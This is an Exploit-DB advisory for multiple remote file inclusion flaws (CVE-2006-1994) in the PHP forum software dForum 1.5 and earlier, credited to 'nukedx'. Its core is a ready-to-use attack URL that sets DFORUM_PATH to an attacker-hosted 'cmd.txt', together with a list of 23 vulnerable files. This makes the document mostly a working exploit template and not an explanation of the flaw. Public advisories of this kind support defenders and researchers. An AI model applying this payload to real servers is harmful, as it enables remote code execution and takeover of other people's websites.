dForum <= 1.5 DFORUM_PATH Multiple Remote File Inclusions

2006-04-21T00:00:00
ID EDB-ID:1706
Type exploitdb
Reporter nukedx
Modified 2006-04-21T00:00:00

Description

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions. CVE-2006-1994. Webapps exploit for php platform

                                        
                                            dForum &lt;= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
Contacts &gt; ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on dForum &lt;= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files -&gt;
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php
Original advisory: http://www.nukedx.com/?viewdoc=27
# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]